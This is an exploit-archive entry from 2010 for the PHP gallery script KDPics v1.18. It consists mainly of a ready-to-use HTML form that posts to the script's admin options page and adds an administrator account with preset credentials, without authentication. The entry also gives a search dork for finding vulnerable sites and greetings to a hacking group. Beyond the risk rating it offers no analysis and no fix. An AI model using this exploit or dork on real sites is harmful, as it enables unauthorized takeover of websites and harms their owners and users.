Genere par KDPics 1.18 remote add administrator

2010-02-16 / 2010-02-17
Credit: Snakespc
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

========= [&#187;] Gnr par KDPics v1.18 Remote Add Admin ========= [&#187;] Script: [Gnr par KDPics v1.18] [&#187;] Language: [ PHP ] [&#187;] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ] [&#187;] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ] [&#187;] Dork: "Gnr par KDPics v1.18" ############## ===[ Exploit ]=== <html> <title>Gnr par KDPics v1.18 Remote Add Admin</title> <body link="#00FF00" text="#008000" bgcolor="#000000"> <form method="POST" action="http://www.site.com/kdpics/admin/index.php3?page=options&categorie="> <input type="hidden" name="type" value="add"> <table border="1" cellpadding="4" style="border-collapse: collapse" width="100%" bordercolor="#808080"> <tr> <td class="top"> <p align="center"><b>User & Pass :Snakespc</b></p> <p align="center"><b><font face="Comic Sans MS"> <a href="http://server/path//index.php?act=idx" style="text-decoration: none"> <font color="#00FF00">[&#187;]Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]</p> [&#187;] Greetz to:[ sec-warTeaM, PrEdAtOr ,alnjm33 >>> All My Mamber >> sec-war.com/cc ]</p>[&#187;] Dork:"Gnr par KDPics v1.18"</font></a></font></b></p> <p align="center"><b>Username:</b></td> </tr> <tr> <td height="1"> <p align="center"><input type="text" name="adminuser" size="30" value="Snakespc"></td> </tr> <tr> <td class="top"> <p align="center"><b>Password:</b></td> </tr> <tr> <td height="22"> <p align="center"> <input type="password" name="adminpass" size="30" value="Snakespc"></td> </tr> <tr> <td align="right"> <p align="center"> <input type="submit" value="Add User >>" style="font-weight: 700"></td> </tr> </form> </table> </html> [&#187;]Author: Snakespc <- #############


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top